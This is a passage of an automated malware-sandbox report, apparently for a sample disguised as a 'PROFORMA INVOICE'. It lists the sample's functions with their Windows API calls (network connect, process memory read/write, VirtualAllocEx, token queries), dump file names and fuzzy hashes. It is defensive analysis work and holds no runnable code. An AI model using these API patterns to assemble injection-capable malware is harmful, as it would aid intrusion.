Opcode Fuzzy Hash: 91035ef19f466310cd7583357f174d31230d158605b640a36eddc184988b8ea6
Instruction Fuzzy Hash: B6215B719043154BEF14AB749C42FEA33ACEF07370F184066F005C72C0EB64D986BA61

Function 00FB8B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00FBA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00FBA84E

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00FB8BD3
WSAGetLastError.WSOCK32(00000000), ref: 00FB8BE2
connect.WSOCK32(00000000,?,00000010), ref: 00FB8BFE

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ErrorLastconnectinet_addrsocket
String ID:
API String ID: 3701255441-0
Opcode ID: 0c0bc92cd0947601291fd783ab826491891b178fee2e736e78009a2a89521d5c
Instruction ID: 2e08118d080096ebbcadd8a2ac417a1af52632110a7799f6391a533c18664241
Opcode Fuzzy Hash: 0c0bc92cd0947601291fd783ab826491891b178fee2e736e78009a2a89521d5c
Instruction Fuzzy Hash: DB2193716002149FDB10AF68CD85F7D77ADEF84760F048459F9169B3D1CB78AC02AB61

Function 00FB8420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00FB8441
GetForegroundWindow.USER32 ref: 00FB8458
GetDC.USER32(00000000), ref: 00FB8494
GetPixel.GDI32(00000000,?,00000003), ref: 00FB84A0
ReleaseDC.USER32(00000000,00000003), ref: 00FB84DB

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 2c17d0ac63e3ccd1da1267410d05db307ef816ad4197a7b11e2872a03b50bd90
Instruction ID: 1a29e2c79f3312b67268b34aef34f0618e7bb39de3a6656cb8df0a90ed2ebbc2
Opcode Fuzzy Hash: 2c17d0ac63e3ccd1da1267410d05db307ef816ad4197a7b11e2872a03b50bd90
Instruction Fuzzy Hash: E921C675A00204EFD700DFA5CC84A9EB7F9EF48341F048479E8499B752CB74AC01EB50

Function 00F7AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00F7AFE3
SelectObject.GDI32(?,00000000), ref: 00F7AFF2
BeginPath.GDI32(?), ref: 00F7B009
SelectObject.GDI32(?,00000000), ref: 00F7B033

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 2e0033c1b22a64dc5999fb80db111e4ff98746d848902247625e32e7ef1e398f
Instruction ID: e4bc03ff52864ac891c715d548551f4bb762efe7fa912ec8dd96a0089a347c6f
Opcode Fuzzy Hash: 2e0033c1b22a64dc5999fb80db111e4ff98746d848902247625e32e7ef1e398f
Instruction Fuzzy Hash: 5721C174800308EFDB30DF54EC88BAE3B69BB19361F28821BE46596194D3794841EF92

Function 00F8217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00F821A9
CreateThread.KERNEL32(?,?,00F822DF,00000000,?,?), ref: 00F821ED
GetLastError.KERNEL32 ref: 00F821F7
_free.LIBCMT ref: 00F82200
__dosmaperr.LIBCMT ref: 00F8220B

Part of subcall function 00F87C0E: __getptd_noexit.LIBCMT ref: 00F87C0E

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
String ID:
API String ID: 2664167353-0
Opcode ID: 8299770d5b5bdb73bab26fe29124c6c334abe4f159f95b36bbcb16c46bc9b64a
Instruction ID: b5e68d8de7b16205ad024e7f81df4cbad4b22e2d32b833284f3f7ac7207a20d0
Opcode Fuzzy Hash: 8299770d5b5bdb73bab26fe29124c6c334abe4f159f95b36bbcb16c46bc9b64a
Instruction Fuzzy Hash: 41112633108746AFEB11BFA4DC46EEB3B98EF01770B200029F924C6191EB35E811B7A1

Function 00F9ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00F9ABD7
GetLastError.KERNEL32(?,00F9A69F,?,?,?), ref: 00F9ABE1
GetProcessHeap.KERNEL32(00000008,?,?,00F9A69F,?,?,?), ref: 00F9ABF0
HeapAlloc.KERNEL32(00000000,?,00F9A69F,?,?,?), ref: 00F9ABF7
GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00F9AC0E

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 032b2f69f1c8fbbab5025cf059d21fa304e2a79939aad4875804004ced98829e
Instruction ID: ed7be96dd644f61ef45296a1da97f63db7866c4b9623b42b9c313a465004da2e
Opcode Fuzzy Hash: 032b2f69f1c8fbbab5025cf059d21fa304e2a79939aad4875804004ced98829e
Instruction Fuzzy Hash: 04013171600248BFEF214FA5DC88D6B3BADEF897657100429F545DB260D671DC40EBA1

Function 00F99ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32 ref: 00F99ADC
ProgIDFromCLSID.OLE32(?,00000000), ref: 00F99AF7
lstrcmpiW.KERNEL32(?,00000000), ref: 00F99B05
CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00F99B15
CLSIDFromString.OLE32(?,?), ref: 00F99B21

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 37534bb5f29900a003c19c4c1c40ecd90dfbcf85e3c3ba12e45397bbff3f0531
Instruction ID: 672388947519d39eb24a1095339d25b8d7023df0a150d5b99eb04a3c3235c57f
Opcode Fuzzy Hash: 37534bb5f29900a003c19c4c1c40ecd90dfbcf85e3c3ba12e45397bbff3f0531
Instruction Fuzzy Hash: 7C018F76A00218BFEB104F58EC84B9E7BEDEB84362F154029F909D6210D7B4DE00EBA0

Function 00FA7A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00FA7A74
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00FA7A82
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00FA7A8A
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00FA7A94
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00FA7AD0

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: f438f9349002caaffff37d97ec162462be691872bde2f2f2bdf4e3d11fc5cf47
Instruction ID: 25628b9fc208d53a0fec6b6076755f9227b145bd90596dbd302c7bd5efc92093
Opcode Fuzzy Hash: f438f9349002caaffff37d97ec162462be691872bde2f2f2bdf4e3d11fc5cf47
Instruction Fuzzy Hash: 43014CB2D0971DEBDF00AFE4DC99ADEBB78FF09711F000456E502B6260DB389650A7A1

Function 00F9AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F9AADA
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F9AAE4
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F9AAF3
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F9AAFA
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F9AB10

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: afa6643fa6e8c6387aa3055ade2ab525378cbf5207235df3277e93970c2558c9
Instruction ID: 8298337545e24b425fcb2d761ce553d4350904bdcd0396a8ecf2d49e578c3e72
Opcode Fuzzy Hash: afa6643fa6e8c6387aa3055ade2ab525378cbf5207235df3277e93970c2558c9
Instruction Fuzzy Hash: 0BF062712012486FFB221FA4ECC8F673B6DFF85768F000029FA41CB190CA609D01EBA1

Function 00F9AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F9AA79
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F9AA83
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F9AA92
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F9AA99
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F9AAAF

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: ee45a293f5544219024261ef4211a4ab9c12306efcbba3804535a38abfa7ad7b
Instruction ID: 7355c328e72e4bde1da7a42576cda1bb2b2a2897f0267fa25730277404a0ad90
Opcode Fuzzy Hash: ee45a293f5544219024261ef4211a4ab9c12306efcbba3804535a38abfa7ad7b
Instruction Fuzzy Hash: BDF04F71201248AFEB115FA5AC89E673BACFF49764F040419FA41CB190DA689C41EAA1

Function 00F9EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00F9EC94
GetWindowTextW.USER32(00000000,?,00000100), ref: 00F9ECAB
MessageBeep.USER32(00000000), ref: 00F9ECC3
KillTimer.USER32(?,0000040A), ref: 00F9ECDF
EndDialog.USER32(?,00000001), ref: 00F9ECF9

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: ba1feec6774f06a14d11500575d773212d3e57ef513b1dde521d1969e839353f
Instruction ID: 4a02845183a40d3b00534959f478162691bcf83957bb53031a943514d7056916
Opcode Fuzzy Hash: ba1feec6774f06a14d11500575d773212d3e57ef513b1dde521d1969e839353f
Instruction Fuzzy Hash: 0B018130900748ABFF359B50DE8EB9677B8FB00B05F040969B5C2A58E0DBF4AA44EB40

Function 00F7B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00F7B0BA
StrokeAndFillPath.GDI32(?,?,00FDE680,00000000,?,?,?), ref: 00F7B0D6
SelectObject.GDI32(?,00000000), ref: 00F7B0E9
DeleteObject.GDI32 ref: 00F7B0FC
StrokePath.GDI32(?), ref: 00F7B117

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 7346c37962d38c3d3170f2ebb525a76c5353299be7ab3539d187c0e2f1811be8
Instruction ID: cb47fda64fa231a306bd3ce4bdb4cca78fef9df5027225f720b1bf5d3955d8b3
Opcode Fuzzy Hash: 7346c37962d38c3d3170f2ebb525a76c5353299be7ab3539d187c0e2f1811be8
Instruction Fuzzy Hash: 29F0193400024CEFDB319F65E80CB583B65AB05372F288315E4A9484F4C77A8955EF51

Function 00FAF23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00FAF2DA
CoCreateInstance.OLE32(00FEDA7C,00000000,00000001,00FED8EC,?), ref: 00FAF2F2
CoUninitialize.OLE32 ref: 00FAF555

Strings

.lnk, xrefs: 00FAF28B, 00FAF290, 00FAF29E

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: .lnk
API String ID: 948891078-24824748
Opcode ID: eb59f73625110465cd294237ed1960383c29c2346682fad9f9930b02528ba93a
Instruction ID: 80238ed0a8a37a91497a41101eab125e261ddf5d1854752efe2381129408302c
Opcode Fuzzy Hash: eb59f73625110465cd294237ed1960383c29c2346682fad9f9930b02528ba93a
Instruction Fuzzy Hash: F1A12CB1104201AFD300EF64CC81DABB7ECEF98714F04492DF59997292DB75EA09DB92

Function 00FAE7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00F6660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F653B1,?,?,00F661FF,?,00000000,00000001,00000000), ref: 00F6662F

CoInitialize.OLE32(00000000), ref: 00FAE85D
CoCreateInstance.OLE32(00FEDA7C,00000000,00000001,00FED8EC,?), ref: 00FAE876
CoUninitialize.OLE32 ref: 00FAE893

Part of subcall function 00F6936C: __swprintf.LIBCMT ref: 00F693AB
Part of subcall function 00F6936C: __itow.LIBCMT ref: 00F693DF

Strings

.lnk, xrefs: 00FAE83B, 00FAE84D

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 9481337974c6f46c0d1883e63d09f9984f23c6c317350be03e0412c7bf06a089
Instruction ID: d1d87502cad2585b3a0d4374832a8580da61dd4134d49808085cef8386851177
Opcode Fuzzy Hash: 9481337974c6f46c0d1883e63d09f9984f23c6c317350be03e0412c7bf06a089
Instruction Fuzzy Hash: AAA145756043019FCB10DF14C88496ABBE9FF89720F048958F99A9B3A1CB35ED45DB91

Function 00F8325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00F832ED

Part of subcall function 00F8E0D0: __87except.LIBCMT ref: 00F8E10B

Strings

pow, xrefs: 00F832C5, 00F832E2

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 045fdf1cde437f2648977b1b81934c0f9876b3cc42d77743b0ab545d3919213c
Instruction ID: 420a09902d7e7c16537b91e43f11a41731c383bab2fd36d9a697be514415de7d
Opcode Fuzzy Hash: 045fdf1cde437f2648977b1b81934c0f9876b3cc42d77743b0ab545d3919213c
Instruction Fuzzy Hash: 9F512632E0920596CB257B18CD453FA3B989B40B30F308D68F4D5821B9DF798E94F746

Function 00FA4606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00FFDC50,?,0000000F,0000000C,00000016,00FFDC50,?), ref: 00FA4645

Part of subcall function 00F6936C: __swprintf.LIBCMT ref: 00F693AB
Part of subcall function 00F6936C: __itow.LIBCMT ref: 00F693DF

CharUpperBuffW.USER32(?,?,00000000,?), ref: 00FA46C5

Strings

THIS, xrefs: 00FA4703
REMOVE, xrefs: 00FA4676

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: BuffCharUpper$__itow__swprintf
String ID: REMOVE$THIS
API String ID: 3797816924-776492005
Opcode ID: f176acaf8ff8ba5227103c2a287edaa13772af0fbbc7d5f70d80ad91c9fe3074
Instruction ID: 2c7dd4aa435c95721e49cdaecd12fcad917eb4437744dabb7816314afaaa2ec9
Opcode Fuzzy Hash: f176acaf8ff8ba5227103c2a287edaa13772af0fbbc7d5f70d80ad91c9fe3074
Instruction Fuzzy Hash: 4341C775A002499FCF00DF54CC81AADB7B8FF8A314F048059E916AB392D7B8EC41EB51

Function 00F9C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FA430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F9BC08,?,?,00000034,00000800,?,00000034), ref: 00FA4335

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00F9C1D3

Part of subcall function 00FA42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F9BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00FA4300

Part of subcall function 00FA422F: GetWindowThreadProcessId.USER32(?,?), ref: 00FA425A
Part of subcall function 00FA422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00F9BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00FA426A
Part of subcall function 00FA422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00F9BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00FA4280

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F9C240
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F9C28D

Strings

@, xrefs: 00F9C2A5

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: aa3515e6a13c5dd425928bb18b8b8c7d4b280008c924d867a1b0f6e1db7021d4
Instruction ID: 7961c54f88f713545c8fb9d1925bbac9e289db246f5ee55f39d7fe50e835426d
Opcode Fuzzy Hash: aa3515e6a13c5dd425928bb18b8b8c7d4b280008c924d867a1b0f6e1db7021d4
Instruction Fuzzy Hash: D24129B290021CAFDF11DFA4CD81AEEB7B8AF4A710F004095FA45B7181DA756E45EBA1

Function 00FCA63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00FFDC00,00000000,?,?,?,?), ref: 00FCA6D8
GetWindowLongW.USER32 ref: 00FCA6F5
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FCA705

Strings

SysTreeView32, xrefs: 00FCA6AA

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
